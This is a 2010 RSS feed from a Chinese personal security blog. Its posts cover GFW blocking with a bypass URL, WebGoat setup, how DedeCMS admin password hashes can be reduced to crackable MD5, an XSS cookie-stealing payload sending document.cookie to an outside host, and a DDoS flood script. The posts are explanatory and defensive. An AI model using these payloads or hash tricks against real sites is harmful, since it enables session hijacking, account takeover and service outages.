<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>I&#039;m Sroan &#187; 网络安全</title>
	<atom:link href="http://www.sroan.com/category/security/feed" rel="self" type="application/rss+xml" />
	<link>http://www.sroan.com</link>
	<description>There&#039;s only one Sroan in the world!</description>
	<lastBuildDate>Thu, 02 Sep 2010 13:25:10 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.1</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>GFW封锁谷歌问答的原理分析</title>
		<link>http://www.sroan.com/1053.html</link>
		<comments>http://www.sroan.com/1053.html#comments</comments>
		<pubDate>Mon, 02 Aug 2010 13:00:43 +0000</pubDate>
		<dc:creator>Sroan</dc:creator>
				<category><![CDATA[IT]]></category>
		<category><![CDATA[网络安全]]></category>
		<category><![CDATA[GFW]]></category>
		<category><![CDATA[分析]]></category>
		<category><![CDATA[谷歌问答]]></category>

		<guid isPermaLink="false">http://www.sroan.com/?p=1053</guid>
		<description><![CDATA[首先解释下什么是GFW，全称Great Firewall，是对中华人民共和国政府在其管辖互联网内部建立的多套网络审查系统（包括相关行政审查系统）的称呼。主要致力于GFW的院校有北邮和上交（Sroan:都是些不要脸的学校），主要公司有启明星辰（002439）等。
在分析之前先大致介绍下GFW一些常用屏蔽方法。
1、DNS劫持
DNS劫持主要表现为访问一些不存在的网站或者访问出现故障的时候会挑战到114这种垃圾搜索上，或者访问谷歌页面却掉到了度娘的页面上。
解决办法：使用国外的DNS，比如谷歌的8.8.8.8
2、DNS污染
举个例子比如解析一个域名 www.sroan.com 正确解析出来的IP是1.1.1.1，但是DNS污染后解析出来的IP是2.2.2.2
解决办法：加密代理访问
3、IP封锁
比如访问国外一个IP无法访问，PING不通，tracert这个IP后发现，全部在边缘路由器（GFW）附近被拦截。换言之，GFW直接拦截带有这个IP头的数据包。
解决办法：加密代理访问
4、TCP连接重置
这个是GFW最擅长的方法，比如你在谷歌中输入一些所谓的敏感词，GFW发现你发送的请求中包含有敏感词，马上reset你的链接，并断开1分钟，于是在1分钟内你无法登陆上谷歌了。还有一种重置并不是基于敏感词的，因为使用https协议后数据经过加密无法再过滤，所以GFW发现使用https协议就直接断开服务，比如谷歌文档。
解决办法：加密代理访问
5、HTTP会话劫持
使用电信的用户应该会比较多的体验到：每次重新连接上网后，返回第一个页面的顶部经常是有广告的。这是因为无耻的电信劫持了你的HTTP会话，在返回数据中加入了那些广告。
以上5种是GFW比较常见的功能，其次分析下谷歌问答的情况，谷歌问答通过GFW审核后的情况后，问答地址(http://www.google.com.hk/wenda/)无法访问，但是谷歌香港（http://www.google.com.hk）是可以正常访问的。那基本可以排除DNS劫持、DNS污染、HTTP会话劫持、IP封锁。那只有基于关键词的TCP连接重置，首先想到的是“wenda”和“/wenda”，在谷歌中输入相关关键词发现可以正常访问。


看来是把域名也带上了，在谷歌中搜索www.google.com.hk/wenda,出现无法访问的信息。


至于为什么谷歌中输入google.com.hk/wenda可以正常搜索，但是无法访问呢？（不带WWW），那是因为谷歌设置了google.com.hk重定向到了www.google.com.hk，所以最后总结下来是GWF通过基于关键词“www.google.com.hk/wenda”对谷歌问答进行TCP连接重置导致其无法访问。
只要在浏览器里输入http://www.google.com.hk///wenda/ 就可以看见能“正常”访问了。


PS：本人长期帮助他人访问任何网站，小姑娘优先。
相关日志谷歌问答为什么如此欢乐？ (2)概率统计对足球单场的彻底分析 (0)北京单场7+球分析 (0)百度对于黑链判断的分析 (7)织梦（DEDECMS）管理员密码加密分析 (0)]]></description>
		<wfw:commentRss>http://www.sroan.com/1053.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>程序BUG无处不在</title>
		<link>http://www.sroan.com/931.html</link>
		<comments>http://www.sroan.com/931.html#comments</comments>
		<pubDate>Fri, 09 Apr 2010 13:57:32 +0000</pubDate>
		<dc:creator>Sroan</dc:creator>
				<category><![CDATA[网络安全]]></category>
		<category><![CDATA[BUG]]></category>
		<category><![CDATA[程序]]></category>

		<guid isPermaLink="false">http://www.sroan.com/?p=931</guid>
		<description><![CDATA[今天心血来潮参加了一个模拟股指期货比赛，初始资金有100W，一开盘就一路下跌，我想大概跌倒3000点就差不多了，没想到那些庄家心狠一路继续下挫。让我心情十分犹豫，突然发现这个模拟股指期货交易有个BUG，就是我在其他地方打一个负数，然后复制过去再提交，竟然可以成交，于是我下了-10000手，于是我的就保证金也变成了负几千万，这样我就等于有无限制的钱了。心一恨，10分钟内拉到涨停，那个叫舒畅啊，也终于体验到了所谓大户的感觉，其他玩家只能眼睁睁地看着我拉上涨停。不过很快系统就暂停了，我的账号也被删除了，系统这个弱智的漏洞也被弥补了。
还有一件事就是今天在超市买了样东西竟然被刷了两次，花了2个小时再把钱退回来，试想如果程序能够辨别商品是否被刷过还会发生这种浪费消费者时间的事么?
相关日志三国杀OL网页版的一些BUG (2)]]></description>
		<wfw:commentRss>http://www.sroan.com/931.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WebGoat的安装</title>
		<link>http://www.sroan.com/757.html</link>
		<comments>http://www.sroan.com/757.html#comments</comments>
		<pubDate>Sat, 06 Mar 2010 10:50:31 +0000</pubDate>
		<dc:creator>Sroan</dc:creator>
				<category><![CDATA[网络安全]]></category>
		<category><![CDATA[WebGoat]]></category>
		<category><![CDATA[安装]]></category>

		<guid isPermaLink="false">http://www.sroan.com/?p=757</guid>
		<description><![CDATA[WebGoat是一个平台无关的Web安全漏洞实验环境，该环境需要Apache Tomcat和JAVA开发环境的支持。它分别为Microsoft Windows和UN*X环境提供了相应的安装程序，下面我们将根据操作系统分别加以介绍。
　　安装Java和Tomcat
 　　需要注意，从版本5开始，这一步可以省略，因为它们自身带有Java Development Kit和Tomcat 5.5。首先安装Java，您可以从http://java.sun.com/downloads/安装和部署合适的版本，最低版本要求为1.4.1，然后安装Tomcat，您可以从http://tomcat.apache.org/download-55.cgi安装和部署Tomcat。
 　　安装到Windows系统
 　　1.将WebGoat-OWASP_Standard-5.2.zip解压至合适的目录中。
 　　2.若要启动Tomcat，切换至前面存放解压后的WebGoat的目录，然后双击webgoat.bat即可。
 　　3.启动浏览器，在地址栏输入http://localhost/WebGoat/attack 。注意，这个链接地址是区分大小写的，务必确保其中使用的是大写字母W和G。
 　　安装到Linux系统
 　　1.将WebGoat-OWASP_Standard-x.x.zip解压至您的工作目录。
 　　2.将webgoat.sh文件中的第17、19和23行中的“1.5”改为“1.6”。
 　　3.因为最新版本运行在一个特权端口上，所以您需要使用下列命令来启/停WebGoat Tomcat：     
 　　(1). 当作为root用户运行在80端口时，使用：  
 　　sudo sh webgoat.sh start80          
　　sudo sh webgoat.sh stop
　　(2). 当运行在8080端口时，使用：           
 　　sh webgoat.sh start8080         
　　sh webgoat.sh stop
　　安装至OS X（Tiger 10.4+）系统
 　　1.将WebGoat-OWASP_Standard-x.x.zip解压至您的工作目录。
 　　2.将webgoat.sh文件中的第10行中的“1.5”改为“1.6”。
 　　3.因为最新版本运行在一个特权端口上，所以您需要使用下列命令来启/停WebGoat Tomcat：    
 　　(1).当作为root用户运行在80端口时，使用：         
 　　sudo sh webgoat.sh start80     
　　 sudo sh webgoat.sh stop
　　(2). 当运行在8080端口时，使用：         
 　　sh webgoat.sh start8080       
　　sh webgoat.sh stop
　　安装至FreeBSD系统 
 　　1.使用下面的命令来安装Tomcat和Java ：      
 　　cd /usr/ports/www/tomcat55     
　　sudo make install
　　2. 安装Java JDK的时候，可能需要手工方式进行下载，届时系统会给出详细的提示。  
 　　3. 将WebGoat-OWASP_Standard-x.x.zip解压至您的工作目录。 
 　　4. 将webgoat.sh文件中的第17、19和23行中的“1.5”改为“1.6”。  
 　　5. 因为最新版本运行在一个特权端口上，所以您需要使用下列命令来启/停WebGoat Tomcat：    
 　(1).当作为root用户运行在80端口时，使用：
 　　sudo sh webgoat.sh start80       
    sudo sh webgoat.sh stop
 

 

　　(2). [...]]]></description>
		<wfw:commentRss>http://www.sroan.com/757.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WebGoat下载地址及简介</title>
		<link>http://www.sroan.com/755.html</link>
		<comments>http://www.sroan.com/755.html#comments</comments>
		<pubDate>Sat, 06 Mar 2010 10:46:00 +0000</pubDate>
		<dc:creator>Sroan</dc:creator>
				<category><![CDATA[网络安全]]></category>
		<category><![CDATA[WebGoat]]></category>
		<category><![CDATA[下载]]></category>

		<guid isPermaLink="false">http://www.sroan.com/?p=755</guid>
		<description><![CDATA[WebGoat是一个用来演示Web应用程序中的典型安全漏洞的应用程序，旨在在应用程序安全审计的上下文中系统、条理地讲解如何测试和利用这些安全漏洞。WebGoat是用Java语言写成的，因此可以安装到所有带有Java虚拟机的平台之上。此外，它还分别为Linux、OS X Tiger和Windows系统提供了安装程序。部署该程序后，用户就可以进入课程了，该程序会自动通过记分卡来跟踪用户的进展。当前提供的训练课程有30多个，其中包括：跨站点脚本攻击（XSS）、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效危险的HTML注释……等等！
　　我们希望通过WebGoat帮助测试人员掌握以下技能： 
　　◆理解web应用程序中的各种高级交互过程 
　　◆确定出有助于发动攻击的客户端可见数据 
　　◆识别和理解能将应用程序暴露在攻击之下的数据和用户交互 
　　◆对这些交互进行测试，并暴露出它们的漏洞 
　　◆攻击应用程序以演示和利用服务器的弱点
 　　对于WebGoat来说，它的安装过程就是下载和解压缩，然后就可以使用了。然而，一些用户可能更喜欢下载war文件。下面就所有的安装方式分别做详细的说明。
WebGoat下载地址: http://code.google.com/p/webgoat/downloads/list

相关日志webgoat Developer 安装失败解决办法 (0)WebGoat的安装 (0)]]></description>
		<wfw:commentRss>http://www.sroan.com/755.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>织梦（DEDECMS）管理员密码加密分析</title>
		<link>http://www.sroan.com/486.html</link>
		<comments>http://www.sroan.com/486.html#comments</comments>
		<pubDate>Fri, 22 Jan 2010 19:57:06 +0000</pubDate>
		<dc:creator>Sroan</dc:creator>
				<category><![CDATA[PHP]]></category>
		<category><![CDATA[网络安全]]></category>
		<category><![CDATA[分析]]></category>
		<category><![CDATA[密码]]></category>
		<category><![CDATA[管理员]]></category>
		<category><![CDATA[织梦]]></category>

		<guid isPermaLink="false">http://www.sroan.com/?p=486</guid>
		<description><![CDATA[织梦的管理员账号和密码保存于数据库表dede_admin里
密码乍一看以为是经过MD5加密的，但是奇怪的竟然有20位！
仔细分析下，原来密码经过MD5加密后为32为，去掉了前5位和后7位，所有就20位了.
那如何使用呢？
也很简单去除前3位和最后一位就是有效MD5密码了。
比如8f2531f09a5c31f529c4
化简后得531f09a5c31f529c
解密后为Sroan
相关日志GFW封锁谷歌问答的原理分析 (4)概率统计对足球单场的彻底分析 (0)北京单场7+球分析 (0)百度对于黑链判断的分析 (7)偶然搜索到一篇别人对我的分析 (0)]]></description>
		<wfw:commentRss>http://www.sroan.com/486.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Godaddy无法解压缩解决办法</title>
		<link>http://www.sroan.com/458.html</link>
		<comments>http://www.sroan.com/458.html#comments</comments>
		<pubDate>Mon, 04 Jan 2010 02:33:20 +0000</pubDate>
		<dc:creator>Sroan</dc:creator>
				<category><![CDATA[网络安全]]></category>
		<category><![CDATA[Godaddy]]></category>
		<category><![CDATA[解压缩]]></category>

		<guid isPermaLink="false">http://www.sroan.com/?p=458</guid>
		<description><![CDATA[Godaddy的空间支持压缩打包和解压缩。
今天我用winrar压缩后，花了10分钟时间压缩，上传到空间后，大概有100MB，但是无法解压缩，原来只支持格式zip，于是把RAR文件换成了zip，但还是无法解压缩，看来必须压缩的时候就是ZIP格式。于是又重新压缩，上传。幸好GODADDY速度还是很快的，平均上传速度有200多K。解压缩速度也很快，本地压缩需要10分钟，服务器上解压缩只需要1分钟。看来Godaddy的服务器还是很不错的。
相关日志godaddy绑定二级域名失败原因分析 (3)最新Godaddy优惠码 (0)Godaddy支付宝支付体验 (0)]]></description>
		<wfw:commentRss>http://www.sroan.com/458.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>vista下装硬盘安装ubuntu</title>
		<link>http://www.sroan.com/254.html</link>
		<comments>http://www.sroan.com/254.html#comments</comments>
		<pubDate>Sat, 17 Oct 2009 17:50:11 +0000</pubDate>
		<dc:creator>Sroan</dc:creator>
				<category><![CDATA[网络安全]]></category>
		<category><![CDATA[vista ubuntu]]></category>

		<guid isPermaLink="false">http://www.sroan.com/?p=254</guid>
		<description><![CDATA[1.为什么硬盘安装？
因为我比较灰主流。硬盘装速度太快了，十分钟不到就完了。磁盘都不转，一点发热量都没有，真没意思。唉……
2.需要准备什么？
2.1   ubuntu 的iso 。版本你自己选吧。我就用的9.04
2.2   在vista下建立好分区吧。至少两个空闲分区：一个挂载系统。另一个作为swap分区
2.3  从iso中提取到的 initrd.gz/vmlinuz文件
这个我要说明一下：在8.04版或者debian的硬盘安装中，这两个文件还要额外去下载。因为光盘里面的检索方式和磁盘检索不同
2.4 grldr：这个到grub4dos网站下载,下载最新版，解压后提取就行
2.5 ntldr：这个在那个啥，网站上自己去找吧。我也有，都传到这里（http://www.uushare.com/user/hadnt/file/2128846）了。
2.6  修改过的menu.lst / boot.ini 文件。
3.  具体安装过程
这个大家参见这两个地方
http://www.pcpop.com/doc/0/242/242833_1.shtml  （直接看第三/四页就成）
http://hi.baidu.com/%C7%E5%B7%E7%EC%C5/blog/item/6365ffbe4285210219d81f2f.html
 我就重点解释下对menu.lst 的改写：
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;
title Install Ubuntu
root (hd0,0)
kernel (hd0,0)/vmlinuz boot=casper iso-scan/filename=/Ubuntu-9.04-desktop-i386.iso ro quiet
splash locale=zh_CN.UTF-8
initrd (hd0,0)/initrd.gz
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-
root(hd0,0)    hd0  : 第一块磁盘 0:第一个分区 (活动的主分区)
iso-scan/filename=/Ubuntu-9.04-desktop-i386.iso   这个就是 iso-scan 命令，实际上你只要把iso放到一个NTFS目录，它就自己可以检索到这个iso。 
假设你把2 中需要的文件都放到了D盘，那么，把(hd0,0) => (hd0,4)。  这个4你可以通过winfgrub [...]]]></description>
		<wfw:commentRss>http://www.sroan.com/254.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>偶然搜索到一篇别人对我的分析</title>
		<link>http://www.sroan.com/238.html</link>
		<comments>http://www.sroan.com/238.html#comments</comments>
		<pubDate>Wed, 14 Oct 2009 17:26:57 +0000</pubDate>
		<dc:creator>Sroan</dc:creator>
				<category><![CDATA[网络安全]]></category>
		<category><![CDATA[分析]]></category>
		<category><![CDATA[跨站]]></category>

		<guid isPermaLink="false">http://www.sroan.com/?p=238</guid>
		<description><![CDATA[全文如下：
现在校内网出现了一个跨站漏洞，当用户在访问一些日志的时候，日志或者分享或者其他的资料就被修改了。
而 事实上，只要他们原因，可以做任何事情，因为他们获取到了你的cookie。
问题原因:
从一篇有问题的日志发现如下的代码:
《img src=&#8217;
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97
&#108&#101&#114&#116&#40&#39&#104&#97&#99&#107&#101&#100&#32
&#98&#121&#32&#83&#114&#111&#97&#110&#39&#41&#59&#119&#105
&#110&#100&#111&#119&#46&#108&#111&#99&#97&#116&#105&#111
&#110&#46&#104&#114&#101&#102&#61&#39&#104&#116&#116&#112
&#58&#47&#47&#119&#119&#119&#46&#51&#51&#105&#113&#46&#99
&#110&#47&#120&#105&#97&#111&#110&#101&#105&#46&#112&#104
&#112&#63&#99&#111&#111&#107&#105&#101&#61&#39&#43&#100&#111
&#99&#117&#109&#101&#110&#116&#46&#99&#111&#111&#107&#105&#101
&#8216;》
这个应该是经过处理了，中间已经没有了分号，如果给src添加上分号，然后使用html_entity_decode解码之后就是:
javascript:alert(&#8216;hacked by Sroan&#8217;);window.location.href=&#8217;
http://www.33iq.cn/xiaonei.php?cookie=&#8217;+document.cookie
很明白了， 实际上就是Sroan利用在img的src中执行javascript中的特性，执行了一段javascript代码，而这段代码会将你的cookie提交到33iq.cn这个网站，然后他们就可以使用你的cookie去做一些事情了，获取你的个人资料，修改你的日志，修改你的个人资料 等等。
很可怕，哈哈。
解决方法:
1. 最重要的当然是过滤个人提交的日志的内容了， 牢记一切输入都是有害的。
2. 可以在cookie中添加IP的信息，在校验cookie的时候，如果IP不正确，则需要用户重新登录。
第一种方法都在使用，但是具体到什么程度，是不是有bug就很难说了，而校内的问题就在这儿了。
第二种方法使用的应该比较少。
当然，理论上，如果直接src等于上面那些东西也不会有问题的，问题是你在处理的时候将那些代码不明地decode了，并显示了出来，问题就来了。
相关日志GFW封锁谷歌问答的原理分析 (4)概率统计对足球单场的彻底分析 (0)北京单场7+球分析 (0)百度对于黑链判断的分析 (7)织梦（DEDECMS）管理员密码加密分析 (0)]]></description>
		<wfw:commentRss>http://www.sroan.com/238.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>一次抵御DDOS攻击经历</title>
		<link>http://www.sroan.com/28.html</link>
		<comments>http://www.sroan.com/28.html#comments</comments>
		<pubDate>Wed, 08 Jul 2009 17:51:24 +0000</pubDate>
		<dc:creator>Sroan</dc:creator>
				<category><![CDATA[网络安全]]></category>
		<category><![CDATA[DDOS]]></category>
		<category><![CDATA[攻击]]></category>

		<guid isPermaLink="false">http://www.sroan.com/?p=28</guid>
		<description><![CDATA[
我预料到了大盘的下挫，但是没有预料到网站会遭受如此强的DDOS攻击，第一次在攻与防的世界中，站在防的一端。这两天和服务器的管理员都聊成了朋友了，疲惫不堪，眼睛都绿了。如果你有耐心看完这篇文章，绝对胜过你在信安实验室呆一周，因为这是一次实实在在的防御！     先说下服务器情况，WIN2000+IIS，无贷款限制，无IIS连接限制，酷睿CPU，CPU上线6%。网站结构基本纯静态HTML+少量PHP。由于CPU有上限，当CPU超负荷工作后，网站就瘫痪掉。
    攻击者买了一个域名（我查过域名历史，攻击者买了这个域名后就来攻击我），让所有肉鸡攻访问该域名上的一个网页，该网页的代码很简单。就四个iframe，就是四次对我的网站发送HTTP请求，说得通俗点，就是每个肉鸡刷新4次网页。从凌晨3点多开始攻击，到了我起来的时候9点多就瘫痪了。
   这个攻击方式最不好的一个地方，暴露了攻击者的转向域名，因为利用iframe转向，get数据包里会有reffer记录，会指向改转向域名的。寻找服务商的客服，结果是他们也没有办法（其实他们也没想到后来会有多严重）
   既然知道对方的转向域名以及攻击方式，我把我的网站的郁闷转向到攻击域名上，也就是说攻击者发送的数据包到我的域名上，我再转给了攻击者，当然这样我的网站也是访问不了，不过攻击者的转向域名的服务器也很快瘫痪了。
   我又把域名解析回来，又恢复正常了。不过攻击又改变了攻击策略。重新写了攻击代码，代码如下








function ajaxProcess(url){
var httpRequest=new HttpRequest();
with(httpRequest){
init();
doSetCallBack(aa,"aaaa");
doSendResuest(url,"GET",httpRequest);
}
}
function aa(str,id){
//document.getElementById(id).innerHTML=str;
} 
function load(){
ajaxProcess("URL?" + Math.random());
ajaxProcess("URL?" + Math.random()); 
//window.setTimeout("load()",1000);
document.getElementById("aa").innerHTML=Math.random();
}


 



这次攻击者更高级了，直接发送GET数据包。为了对付防火墙的过滤方式，攻击者还加上了随机数，用来逃过防火墙的防御。网站又一次瘫痪。客服打电话给我，说我的网站占用资源超高，已经影响到气他用户了，寻求解决。 
仔细分析攻击代码，认为这个就是变相的CC攻击，可以通过代码防止攻击者的不断恶意刷新。
找了一个session的防CC代码
session_start();
$allow_sep = &#8220;30000&#8243;;
if (isset($_SESSION["post_sep"]))
{
  if (time() &#8211; $_SESSION["post_sep"] < $allow_sep)
  {
        exit(&#8220;请不要反复刷新&#8221;);
}
else
{
    [...]]]></description>
		<wfw:commentRss>http://www.sroan.com/28.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
